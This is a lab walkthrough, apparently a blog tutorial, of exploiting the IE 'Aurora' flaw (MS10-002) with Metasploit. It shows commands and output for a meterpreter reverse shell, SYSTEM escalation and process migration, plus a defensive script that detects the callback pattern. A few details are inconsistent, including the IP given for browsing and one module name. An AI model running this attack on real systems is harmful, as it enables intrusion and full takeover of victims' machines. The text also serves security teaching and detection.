Contents

  • 1. MS10_002 Aurora vulnerability
  • 2. Advanced options

1. MS10_002 Aurora vulnerability

This post briefly describes how to use Metasploit to run a penetration test against ms10_002 (the Aurora vulnerability). For learning purposes only.

Test environment   Description   IP
Attacker host      kali2020      192.168.1.113
Target host        win xp sp3    192.168.1.106

① Start msf, search for ms10_002, select the exploit module in msf, and set its parameters

msf6 > search ms10_002

Matching Modules
================

   #  Name                                        Disclosure Date  Rank    Check  Description
   -  ----                                        ---------------  ----    -----  -----------
   0  exploit/windows/browser/ms10_002_aurora     2010-01-14       normal  No     MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
   1  exploit/windows/browser/ms10_002_ie_object  2010-01-21       normal  No     MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/browser/ms10_002_ie_object

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms10_002_aurora) > options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/browser/ms10_002_aurora) > set srvport 80
srvport => 80
msf6 exploit(windows/browser/ms10_002_aurora) > set lport 443
lport => 443
msf6 exploit(windows/browser/ms10_002_aurora) > set uripath /
uripath => /
msf6 exploit(windows/browser/ms10_002_aurora) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.113:443
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.113:80/
msf6 exploit(windows/browser/ms10_002_aurora) > [*] Server started.

② The output shows that the phishing site is now listening on local port 80. Open the browser on the target machine and enter 192.168.1.106

③ The attacker host compromises the target and obtains a meterpreter session

msf6 exploit(windows/browser/ms10_002_aurora) > [*] Server started.
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.106    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.106:4278) at 2021-06-07 13:25:17 +0800

msf6 exploit(windows/browser/ms10_002_aurora) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x86/windows  WINXP-1\st21 @ WINXP-1  192.168.1.113:443 -> 192.168.1.106:4278 (192.168.1.106)

msf6 exploit(windows/browser/ms10_002_ie_object) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP-1\st21
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > 
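As an added example (not part of the original post), the Python script below shows how a defender could spot the trace that steps ① to ③ leave in firewall or netflow logs: a client fetching a page from an internal host that is not a sanctioned web server, followed within seconds by a new connection from the same client back to that host on a different port, exactly what happens here between 192.168.1.106 and 192.168.1.113 (port 80, then 443). The log format, the allow-list of sanctioned web servers and the sample records are all constructed assumptions.

```python
from datetime import datetime, timedelta

# Assumed allow-list of hosts that legitimately serve HTTP on this network.
SANCTIONED_WEB_SERVERS = {"192.168.1.1"}
# Ports on which a plain browser fetch is expected; 443 is deliberately not
# listed because the reverse handler in this lab listens there.
WEB_PORTS = {80, 8080}
WINDOW = timedelta(seconds=120)

# Constructed connection records, one per line: "date time src dst dport".
# .106 fetches a page from the workstation .113 and calls back on 443 fifteen
# seconds later; .109 fetches the page but its callback falls outside the window.
SAMPLE_LOG = """\
2021-06-07 13:24:50 192.168.1.106 192.168.1.1 80
2021-06-07 13:25:02 192.168.1.106 192.168.1.113 80
2021-06-07 13:25:17 192.168.1.106 192.168.1.113 443
2021-06-07 13:30:00 192.168.1.109 192.168.1.113 80
2021-06-07 13:40:00 192.168.1.109 192.168.1.113 443
"""


def parse(log):
    """Turn the text log into (timestamp, src, dst, dport) tuples."""
    records = []
    for line in log.splitlines():
        day, clock, src, dst, port = line.split()
        records.append((datetime.fromisoformat(f"{day} {clock}"), src, dst, int(port)))
    return records


def find_reverse_callbacks(records, window=WINDOW):
    """Return (client, server, fetch_time, callback_port) for every client that
    pulled a page from a host outside the allow-list and then opened a new
    connection to that same host on another port within `window`."""
    last_fetch = {}
    alerts = []
    for ts, src, dst, port in sorted(records):
        if port in WEB_PORTS:
            if dst not in SANCTIONED_WEB_SERVERS:
                last_fetch[(src, dst)] = ts  # remember the suspicious fetch
            continue
        fetched = last_fetch.get((src, dst))
        if fetched is not None and ts - fetched <= window:
            alerts.append((src, dst, fetched, port))
    return alerts


if __name__ == "__main__":
    for client, server, when, port in find_reverse_callbacks(parse(SAMPLE_LOG)):
        print(f"{when} {client} fetched from {server} then connected back on {port}")
```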

2. Advanced options

Use advanced to view the module's advanced options

msf6 exploit(windows/browser/ms10_002_aurora) > advanced

Module advanced options (exploit/windows/browser/ms10_002_aurora):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ListenerComm                             no        The specific communication channel to use for this service
   SSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   SendRobots              false            no        Return a robots.txt file if asked for one
   URIHOST                                  no        Host to use in URI (useful for tunnels)
   URIPORT                                  no        Port to use in URI (useful for tunnels)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module


Payload advanced options (windows/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadBindPort                               no        Port to bind reverse tcp socket to on target system.
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

For example, to migrate into another process immediately after connecting to the target machine so that the session is not killed:

msf6 exploit(windows/browser/ms10_002_aurora) > set autorunscript migrate -f
autorunscript => migrate -f
